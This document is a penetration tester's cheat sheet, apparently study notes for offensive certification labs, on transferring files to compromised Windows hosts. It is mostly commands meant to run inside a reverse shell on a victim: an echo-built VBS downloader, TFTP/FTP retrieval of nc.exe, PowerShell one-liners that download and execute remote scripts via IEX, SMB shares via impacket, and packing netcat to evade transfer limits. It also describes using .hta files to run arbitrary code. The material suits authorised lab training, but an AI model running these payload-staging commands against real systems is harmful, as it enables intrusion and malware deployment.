File Transfers

HTTP:

PYTHON: python -m SimpleHTTPServer 80 Apache: # cd /var/www/html/ # wget -O exploit.html http://www.exploit-db.com/download/24017 # systemctl start apache2

or

#service apache2 start //HTTP. Navigate to 127.0.0.1 to see it //all documents home directory will be /var/www/ //add a file #echo "Yo bitch" > /var/www/index.html //browse back to page and see how we changed the index. PHP: #php -S 0.0.0.0:8000 RUBY: #ruby -run -e httpd . -p 8000 BUSYBOX: #busybox httpd -f -p 8000 .hta: (internet explorer/edge vector) If a file is created with the extension of .hta instead of .html, Internet Explorer will automatically interpret it as a HTML Application and offer the ability to execute it using the mshta.exe program. This is used as a way to launch applications directly from the browser instead of having to download them then execute. This is against the typical security rules imposed in internet explorer so mshta.exe launches and runs the hta file outside of the security boundary's of the browser. This requires the user to click to accept these permissions. If the user does this then we can run arbitrary code on the system with the users permissions.

VBS: (for wget) When FTP/TFTP fails you, this wget script in VBS was the go to on Windows machines. # In reverse shell echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs # Execute cscript wget.vbs http://10.10.10.10/file.exe file.exe

FTP

Passing netcat to a machine with a tftp server: //Windows XP and 2003 contain a TFTPclient, by default. A benefit for this program is in non interactive shells the tftp works well since it is not an interactive program like vim or ftp kali:

TFTP: (nc transfer) in Kali: #atftpd --daemon --port 69 /tftp In reverse shell #tftp -i 10.10.10.10 GET nc.exe FTP: We can turn the FTP file transfer to a non-interactive process, by providing the ftp.exe client with a text file containing the commands to be executed. Set up ftp server on attacker: Then on the win vic, With our FTP server configured, we can now paste the following commands into a remote Windows shell and download files over FTP non-interactively. ------------or you can just make a txt file normally if you have an editor----- C:\Users\offsec>echo open 10.11.0.5 21> ftp.txt C:\Users\offsec>echo USER offsec>> ftp.txt C:\Users\offsec>echo ftp>> ftp.txt C:\Users\offsec>echo bin >> ftp.txt C:\Users\offsec>echo GET nc.exe >> ftp.txt C:\Users\offsec>echo bye >> ftp.txt ------------ C:\Users\offsec>ftp -v -n -s:ftp.txt

With pyftpdlib

pip install pyftpdlib

Run:

(-w flag allows anonymous write access)

python -m pyftpdlib -p 21 -u bill -P bobby

curl --user bill:bobby ftp://10.10.14.50/winPEASx86.exe -o wp32.exe

Anonymous transfer

#wget -m --no-passive ftp://anonymous:[email protected]

PowerShell:

Non-Interactive Powershell and VBScript file download methods: The following set of non-interactive echo commands, when pasted into a remote shell, will write out a VBS script that acts as a simple HTTP downloader: I think this goes towards the win vic echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs We can now host files at w/e dir we launch simplehttpserver from and then download them from the win machine C:\Users\Offsec>cscript wget.vbs http://10.11.0.5/evil.exe evil.exe Now with Basic PowerShell: C:\Users\Offsec> echo $storageDir = $pwd > wget.ps1 C:\Users\Offsec> echo $webclient = New-Object System.Net.WebClient >>wget.ps1 C:\Users\Offsec> echo $url = "http://10.10.14.20:8081/evil.exe" >>wget.ps1 C:\Users\Offsec> echo $file = "new-exploit.exe" >>wget.ps1 C:\Users\Offsec> echo $webclient.DownloadFile($url,$file) >>wget.ps1 Now, we can use PowerShell to run the script and download our file: C:\Users\Offsec> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

PS file transfers(you might need to try ps file path sometimes): # In reverse shell - Windows powershell -c "(new-object System.Net.WebClient).DownloadFile('http://172.16.40.5:8080/nc.exe','C:\Users\eLS\nc.exe')" //send shell file and run c:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/myshell.ps1') or PS>IEX (New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/Sherlock.ps1')

FILE TRANSFER: >powershell -c "(new-object System.Net.WebClient).DownloadFile('http:/ /10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')" >wget.exe -V

SMB

//start the host #impacket-smbserver MyShare $(pwd) -smb2support -user squanchy -password squanchysPass Dont get your hopes up its not a real cred set

//make object on winbox >$pass = convertto-securestring 'squanchysPass' -AsPlainText -Force >$pass //testing it worked >$cred = New-Object System.Management.Automation.PSCredential('squanchy', $pass) >$cred >New-PSDrive -Name squanchy -PSProvider FileSystem -Credential $cred -Root \\<kali ip>\MyShare

//then wait a while for it to connect and give you a prompt (about a minute) >cd squanchy: >dir >.\winPEAS.exe >

Tips:

Pack and move nc: # locate nc.exe|grep binaries # cp /usr/share/windows-binaries/nc.exe . # ls -l nc.exe # upx -9 nc.exe # ls -l nc.exe # locate exe2bat # cp /usr/share/windows-binaries/exe2bat.exe . # wine exe2bat.exe nc.exe nc.txt # head nc.txt //We can now transfer the nc.txt to the win machine and then launch the file back into an exe with debug.exe The pdf did not show this step but should be simple and easy to google.